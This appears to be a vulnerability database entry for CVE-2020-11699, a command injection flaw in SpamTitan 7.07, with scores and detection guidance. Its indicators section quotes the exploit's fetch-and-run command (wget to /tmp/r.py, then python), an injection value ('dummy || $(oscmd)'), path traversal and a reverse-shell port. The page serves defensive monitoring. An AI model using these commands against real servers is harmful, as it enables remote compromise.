cbcvebase.
CVE-2020-11699
published 2020-09-17

CVE-2020-11699: An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote…

PriorityP263high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
9.64%
94.9th percentile
An issue was discovered in Titan SpamTitan 7.07. Improper validation of the parameter fname on the page certs-x.php would allow an attacker to execute remote code on the target server. The user has to be authenticated before interacting with this page.

Affected

1 ranges
VendorProductVersion rangeFixed in
titanhqspamtitan

Detection & IOCsextracted from sources · hover to see the quote

path/certs-x.php
path/certs.php
path/tmp/r.py
command/usr/local/bin/wget %s -O /tmp/r.py;/usr/local/bin/python /tmp/r.py
commanddummy || $(oscmd)
path../../../..
port4242
  • Monitor POST requests to /certs-x.php where the 'fname' parameter contains shell metacharacters such as '||', '$(...)', or pipe characters, indicating command injection attempts.
  • Detect POST requests to /certs-x.php with 'jaction=deletecert' combined with shell injection patterns in the 'fname' parameter.
  • Detect POST requests to /certs-x.php with 'jaction=downloadkey' and 'fname' values containing path traversal sequences (e.g., '../../../..') indicating arbitrary file read attempts (CVE-2020-11700).
  • Alert on outbound wget or python execution from the SpamTitan web process, particularly writing to /tmp/r.py and executing it, which is the reverse shell staging pattern used in this exploit.
  • Monitor for CSRF token extraction via GET to /certs.php followed immediately by a POST to /certs-x.php from the same session, which is the exploit's two-step attack pattern.
  • Detect inbound reverse shell connections on non-standard ports (default 4242) originating from the SpamTitan server process after exploitation.
  • ·Exploitation requires prior authentication to the SpamTitan web interface; unauthenticated attackers cannot directly trigger this RCE.
  • ·The exploit targets SpamTitan Gateway 7.07 running on FreeBSD; the hardcoded binary paths (/usr/local/bin/wget, /usr/local/bin/python) are FreeBSD-specific and may differ on other platforms.
  • ·Earlier versions of SpamTitan Gateway prior to 7.07 may also be vulnerable, as the advisory notes the issue exists in 'probably previous versions'.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.0CRITICALAV:N/AC:L/Au:S/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.